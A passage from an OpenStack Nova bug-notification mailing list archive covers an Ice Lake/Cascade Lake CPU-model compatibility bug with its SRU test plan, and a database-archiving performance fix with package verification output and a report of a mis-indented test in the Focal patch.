2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service service.start() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.manager.init_host() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.driver.init_host(host=self.host) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._check_cpu_compatibility() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(msg) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service If I make a custom libvirt CPU map file which removes the "" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this. Currently the only "proper" way I'm aware of to work around this right now is to fall back to a Broadwell-based configuration which lacks the "mpx" feature to use as a common baseline, but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common in both Cascade Lake and Ice Lake. I would rather if there were a way to use the Cascade Lake settings but simply remove that "mpx" feature from use. ---- Steps to reproduce ================== On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in nova.conf in libvirt settings: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx Then try to start nova. Expected result =============== Nova should start since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server- noTSX as a common baseline model for both Cascade Lake and Ice Lake servers. Actual result ============= Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help. Environment =========== Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2. Hypervisor: libvirt + KVM Other relevant notes ==================== There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily in regards to the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well. * https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead as it seems to more correctly identify the CPU model even if there are disabled flags like MPX. * https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu. =============== SRU Description =============== [Impact] When using IceLake CPUs alongside CascadeLake CPUs, the Nova code does not start due to comparing CPU models. It fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features. The Libvirt upstream team will not add specific support to IceLake [1]. The fix [2] in Nova is to ignore CPU check (as a configurable workaround) as let libvirt handle the added/removed flags, which is assumed to work for this specific case. [Test case] Due to not having Icelake and Cascadelake CPUs in our usual lab for testing of this specific scenario, the test case for this could be either: 1) run for this SRU is running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expect the test to pass. Test run evidence will be attached to LP. 2) manually deploy nova and the necessary openstack services to get Nova to the code point of validating the issue in a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need of other services (conductor, keystone, mysql, etc) but for a proper validation a clean installation (without any hackery) is considered mandatory. In such case, the test case would be: a) Deploy nova and required services in an IceLake machine b) Make sure the nova.conf has: cpu_mode = custom cpu_models = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, therefore presenting the error: 2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake- Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. d) Install package containing the fix and confirm the successful nova- compute service restart, not containing the error and containing this instead: 2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX [Regression Potential] There is 1 new behavior introduced and 1 changed. The behavior introduced is gated by a new config option that needs to be enabled, and when enabled, it skips running the code. The behavior changed is the one assumed by the default disabled value of the config option. The fact that the code being backported in Yoga-Ussuri is exactly the same as in currently Master (Caracal+), it means that no issues have been found with the code across 4 releases, giving some confidence that the code changed is unlikely to cause issues. [Other Info] [1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064 [2] https://review.opendev.org/c/openstack/nova/+/871969 To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions From 2024258 at bugs.launchpad.net Fri Aug 2 08:18:34 2024 From: 2024258 at bugs.launchpad.net (Chengen Du) Date: Fri, 02 Aug 2024 08:18:34 -0000 Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172258671500.2196669.11132417503309717563.malone@juju-98d295-prod-launchpad-3> The nova package in jammy-proposed has been tested according to the [Test Plan]. The test results met our expectations. ubuntu at juju-7d3324-openstack-jammy-7:~$ apt policy nova-common nova-common: Installed: 3:25.2.1-0ubuntu2.7 Candidate: 3:25.2.1-0ubuntu2.7 Version table: *** 3:25.2.1-0ubuntu2.7 500 500 http://archive.ubuntu.com/ubuntu jammy-proposed/main amd64 Packages 100 /var/lib/dpkg/status 3:25.2.1-0ubuntu2.6 500 500 http://availability-zone-2.clouds.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages 3:25.0.0-0ubuntu1 500 500 http://availability-zone-2.clouds.archive.ubuntu.com/ubuntu jammy/main amd64 Packages ** Tags removed: verification-needed-jammy ** Tags added: verification-done-jammy -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions From 2024258 at bugs.launchpad.net Fri Aug 2 08:33:30 2024 From: 2024258 at bugs.launchpad.net (Chengen Du) Date: Fri, 02 Aug 2024 08:33:30 -0000 Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172258761032.2223934.14564219984269660929.malone@juju-98d295-prod-launchpad-3> @mfo @slyon I apologize for the indentation issue in the focal patch. I may have inadvertently modified the patches after testing them. The issue originates from nova/tests/functional/db/test_archive.py, where the test_archive_deleted_rows_parent_child_trees_one_at_time function is not indented correctly. Could you please confirm if I need to upload a new patch to fix this? I apologize again for increasing your workload. ** Tags removed: verification-needed verification-needed-focal ** Tags added: verification-failed-focal -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions